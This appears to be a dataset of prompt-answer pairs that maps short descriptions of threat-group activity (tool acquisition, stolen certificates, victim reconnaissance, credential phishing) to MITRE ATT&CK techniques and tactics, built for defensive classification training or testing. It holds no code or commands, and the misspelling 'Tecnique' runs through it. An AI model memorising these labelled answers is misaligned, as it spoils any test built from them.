+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POLONIUM has obtained and used tools such as AirVPN and plink in their operations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has obtained and used open-source tools such as QuasarRAT.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PittyTiger has obtained and used tools such as Mimikatz and gsecdump.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has acquired open-source tools for their operations, including Invoke-PSImage, which was used to establish an encrypted channel from a compromised host to Sandworm Team's C2 server in preparation for the 2018 Winter Olympics attack, as well as Impacket and RemoteExec, which were used in their 2022 Prestige operations.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has obtained and modified versions of publicly-available tools like Empire and PsExec.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has obtained free and publicly available tools including SingleFile and HTTrack to copy login pages of targeted organizations.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used commodity remote access tools.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used a variety of tools in their operations, including AdFind, BloodHound, Mimikatz, and PowerSploit.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has obtained and used tools such as Impacket, pwdump, Mimikatz, gsecdump, NBTscan, and Windows Credential Editor.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Thrip has obtained and used tools such as Mimikatz and PsExec.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has obtained and customized publicly-available tools like Mimikatz.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used customized versions of open-source tools for C2.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has obtained and used Empire for post-exploitation activities.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has obtained and used tools such as Mimikatz.,"Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has utilized tools such as Empire, Cobalt Strike, Cobalt Strike, Rubeus, AdFind, BloodHound, Metasploit, Advanced IP Scanner, Nirsoft PingInfoView, and SoftPerfect Network Scanner for targeting efforts.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used and modified open-source tools like Impacket, Mimikatz, and pwdump.","Tecnique: T1588.002 Obtain Capabilities: Tool, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.","Tecnique: T1588.003 Obtain Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used stolen code-signing certificates for its malicious payloads.,"Tecnique: T1588.003 Obtain Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has stolen legitimate certificates to sign malicious payloads.,"Tecnique: T1588.003 Obtain Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used an expired open-source X.509 certificate for testing in the OpenSSL repository, to connect to actor-controlled C2 servers.","Tecnique: T1588.003 Obtain Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has obtained stolen valid certificates, including from VMProtect and the Chinese instant messaging application Youdu, for their operations.","Tecnique: T1588.003 Obtain Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has obtained code signing certificates signed by DigiCert, GlobalSign, and COMOOD for malware payloads.","Tecnique: T1588.003 Obtain Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has used code signing certificates issued to fake companies to bypass security controls.,"Tecnique: T1588.003 Obtain Capabilities: Code Signing Certificates, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Honeybee, the threat actors stole a digital signature from Adobe Systems to use with their MaoCheng dropper.","Tecnique: T1588.004 Obtain Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used valid, stolen digital certificates for some of their malware and tools.","Tecnique: T1588.004 Obtain Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has obtained SSL certificates for their C2 domains.,"Tecnique: T1588.004 Obtain Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used a valid digital certificate for some of their malware.,"Tecnique: T1588.004 Obtain Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has obtained free Let's Encrypt SSL certificates for use on their phishing pages.,"Tecnique: T1588.004 Obtain Capabilities: Digital Certificates, Tactic: TA0042 Resource Development"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has obtained exploit code for various CVEs.,"Tecnique: T1588.005 Obtain Capabilities: Exploits, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In 2017, Sandworm Team conducted technical research related to vulnerabilities associated with websites used by the Korean Sport and Olympic Committee, a Korean power company, and a Korean airport.","Tecnique: T1588.006 Obtain Capabilities: Vulnerabilities, Tactic: TA0042 Resource Development"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets.","Tecnique: T1589 Gather Victim Identity Information, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors targeted people based on their organizational roles and privileges.","Tecnique: T1589 Gather Victim Identity Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has conducted targeted surveillance against activists and bloggers.,"Tecnique: T1589 Gather Victim Identity Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has researched employees to target for social engineering attacks.,"Tecnique: T1589 Gather Victim Identity Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has identified specific potential victims at targeted organizations.,"Tecnique: T1589 Gather Victim Identity Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has gathered detailed information of target employees to enhance their social engineering lures.,"Tecnique: T1589 Gather Victim Identity Information, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations.","Tecnique: T1589 Gather Victim Identity Information, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider sent phishing messages via SMS to steal credentials.","Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For the SolarWinds Compromise, APT29 conducted credential theft operations to obtain credentials to be used for access to victim environments.","Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has harvested user's login credentials.,"Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To support initial access, APT41 gained access to databases with information about existing accounts as well as plaintext and hashed passwords.","Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks.,"Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has gathered user identities and credentials to gain initial access to a victim's organization; the group has also called an organization's help desk to reset a target's credentials.,"Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has collected compromised credentials to use for targeting efforts.,"Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound gathered credentials from two victims that they then attempted to validate across 75 different websites. Magic Hound has also collected credentials from over 900 Fortinet VPN servers in the US, Europe, and Israel.","Tecnique: T1589.001 Gather Victim Identity Information: Credentials, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has collected e-mail addresses for activists and bloggers in order to target them with spyware.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has gathered targeted individuals' e-mail addresses through open source research and website contact forms.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has collected e-mail addresses for users they intended to target.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing.","Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has collected valid email addresses that were subsequently used in spearphishing campaigns.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has gathered employee email addresses, including personal accounts, for social engineering and initial access efforts.","Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group collected email addresses belonging to various departments of a targeted organization which were used in follow-on phishing campaigns.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has identified high-value email accounts in academia, journalism, NGO's, foreign policy, and national security for targeting.","Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has collected e-mail addresses from targeted organizations from open Internet searches.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used spoofed company emails that were acquired from email clients on previously infected hosts to target other individuals.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can check for the existence of user email addresses using public Microsoft APIs.,"Tecnique: T1589.002 Gather Victim Identity Information: Email Addresses, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To support initial access, APT41 gained access to databases with information about existing accounts and lists of employees.","Tecnique: T1589.003 Gather Victim Identity Information: Employee Names, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has collected victim employee name information.,"Tecnique: T1589.003 Gather Victim Identity Information: Employee Names, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team's research of potential victim organizations included the identification and collection of employee information.,"Tecnique: T1589.003 Gather Victim Identity Information: Employee Names, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has collected lists of names for individuals from targeted organizations.,"Tecnique: T1589.003 Gather Victim Identity Information: Employee Names, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM gathered the fully qualified domain names (FQDNs) for targeted Exchange servers in the victim's environment.,"Tecnique: T1590 Gather Victim Network Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team conducted technical reconnaissance of the Parliament of Georgia's official internet domain prior to its 2019 attack.,"Tecnique: T1590.001 Gather Victim Network Information: Domain Properties, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals can gather information about a tenant’s domains using public Microsoft APIs.,"Tecnique: T1590.001 Gather Victim Network Information: Domain Properties, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has searched for infrastructure that can provide remote access to an environment for targeting efforts.,"Tecnique: T1590.004 Gather Victim Network Information: Network Topology, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has limited its watering hole attacks to specific IP address ranges.,"Tecnique: T1590.005 Gather Victim Network Information: IP Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has obtained IP addresses for publicly-accessible Exchange servers.,"Tecnique: T1590.005 Gather Victim Network Information: IP Addresses, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has captured the IP addresses of visitors to their phishing sites.,"Tecnique: T1590.005 Gather Victim Network Information: IP Addresses, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.","Tecnique: T1591 Gather Victim Org Information, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has collected victim organization information including but not limited to organization hierarchy, functions, press releases, and others.","Tecnique: T1591 Gather Victim Org Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals.,"Tecnique: T1591 Gather Victim Org Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has collected location information from visitors to their phishing sites.,"Tecnique: T1591.001 Gather Victim Org Information: Determine Physical Locations, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has collected open source information to identify relationships between organizations for targeting purposes.,"Tecnique: T1591.002 Gather Victim Org Information: Business Relationships, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has gathered detailed knowledge of an organization's supply chain relationships.,"Tecnique: T1591.002 Gather Victim Org Information: Business Relationships, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In preparation for its attack against the 2018 Winter Olympics, Sandworm Team conducted online research of partner organizations listed on an official PyeongChang Olympics partnership site.","Tecnique: T1591.002 Gather Victim Org Information: Business Relationships, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.","Tecnique: T1591.004 Gather Victim Org Information: Identify Roles, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting.","Tecnique: T1591.004 Gather Victim Org Information: Identify Roles, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has gathered detailed knowledge of team structures within a target organization.,"Tecnique: T1591.004 Gather Victim Org Information: Identify Roles, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.","Tecnique: T1592.002 Gather Victim Host Information: Software, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has captured the user-agent strings from visitors to their phishing sites.,"Tecnique: T1592.002 Gather Victim Host Information: Software, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. Sandworm Team also collected a list of computers using specific software as part of its targeting efforts.","Tecnique: T1592.002 Gather Victim Host Information: Software, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has interacted with Office 365 tenants to gather details regarding target's environments.,"Tecnique: T1592.004 Gather Victim Host Information: Client Configurations, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team researched Ukraine's unique legal entity identifier (called an ""EDRPOU"" number), including running queries on the EDRPOU website, in preparation for the NotPetya attack. Sandworm Team has also researched third-party websites to help it craft credible spearphishing emails.","Tecnique: T1593 Search Open Websites/Domains, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.","Tecnique: T1593.001 Search Open Websites/Domains: Social Media, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has copied data from social media sites to impersonate targeted individuals.,"Tecnique: T1593.001 Search Open Websites/Domains: Social Media, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.,"Tecnique: T1593.001 Search Open Websites/Domains: Social Media, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims.","Tecnique: T1593.002 Search Open Websites/Domains: Search Engines, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has searched public code repositories for exposed credentials.,"Tecnique: T1593.003 Search Open Websites/Domains: Code Repositories, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors peformed reconnaissance of victims' internal websites via proxied connections.","Tecnique: T1594 Search Victim-Owned Websites, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has used contact forms on victim websites to generate phishing e-mails.,"Tecnique: T1594 Search Victim-Owned Websites, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has searched for information on the target company's website.,"Tecnique: T1594 Search Victim-Owned Websites, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has conducted research against potential victim websites as part of its operational planning.,"Tecnique: T1594 Search Victim-Owned Websites, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silent Librarian has searched victim's websites to identify the interests and academic areas of targeted individuals and to scrape source code, branding, and organizational contact information for phishing pages.","Tecnique: T1594 Search Victim-Owned Websites, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles engaged in network reconnaissance against targets of interest.","Tecnique: T1595 Active Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has scanned specific lists of target IP addresses.,"Tecnique: T1595.001 Active Scanning: Scanning IP Blocks, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used the publicly available Interactsh tool to identify Ivanti Connect Secure VPNs vulnerable to CVE-2024-21893.","Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has performed large-scale scans in an attempt to find vulnerable servers.,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as the JexBoss tool to identify vulnerabilities in Java applications.","Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has used publicly accessible DNS logging services to identify servers vulnerable to Log4j (CVE 2021-44228).,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has scanned for vulnerabilities in the public-facing servers of their targets.,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has conducted widespread scanning to identify public-facing systems vulnerable to CVE-2021-44228 in Log4j and ProxyShell vulnerabilities; CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in on-premises MS Exchange Servers; and CVE-2018-13379 in Fortinet FortiOS SSL VPNs.","Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has scanned network infrastructure for vulnerabilities as part of its operational planning.,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volatile Cedar has performed vulnerability scans of the target server.,"Tecnique: T1595.002 Active Scanning: Vulnerability Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 leverages various tools and frameworks to brute-force directories on web servers.,"Tecnique: T1595.003 Active Scanning: Wordlist Scanning, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volatile Cedar has used DirBuster and GoBuster to brute force web directories and DNS subdomains.,"Tecnique: T1595.003 Active Scanning: Wordlist Scanning, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 uses the Chinese website fofa.su, similar to the Shodan scanning service, for passive scanning of victims.","Tecnique: T1596.005 Search Open Technical Databases: Scan Databases, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.,"Tecnique: T1597 Search Closed Sources, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has purchased credentials and session tokens from criminal underground forums.,"Tecnique: T1597.002 Search Closed Sources: Purchase Technical Data, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used spearphishing to compromise credentials.,"Tecnique: T1598 Phishing for Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has used a combination of credential phishing and social engineering to capture one-time-password (OTP) codes.,"Tecnique: T1598 Phishing for Information, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM targeted presidential campaign staffers with credential phishing e-mails.,"Tecnique: T1598 Phishing for Information, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider sent Telegram messages impersonating IT personnel to harvest credentials.","Tecnique: T1598.001 Phishing for Information: Spearphishing Service, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.,"Tecnique: T1598.002 Phishing for Information: Spearphishing Attachment, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideCopy has crafted generic lures for spam campaigns to collect emails and credentials for targeting efforts.,"Tecnique: T1598.002 Phishing for Information: Spearphishing Attachment, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.,"Tecnique: T1598.002 Phishing for Information: Spearphishing Attachment, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has conducted credential phishing campaigns with embedded links to attacker-controlled domains.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used malicious links to direct users to web pages designed to harvest credentials.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used links in e-mail to steal account information.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used SMS and email messages with links designed to steal credentials or track victims.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has delivered web bugs to profile their intended targets.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.","Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has crafted spearphishing emails with hyperlinks designed to trick unwitting recipients into revealing their account credentials.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has sent e-mails with malicious links to credential harvesting websites.,"Tecnique: T1598.003 Phishing for Information: Spearphishing Link, Tactic: TA0043 Reconnaissance"
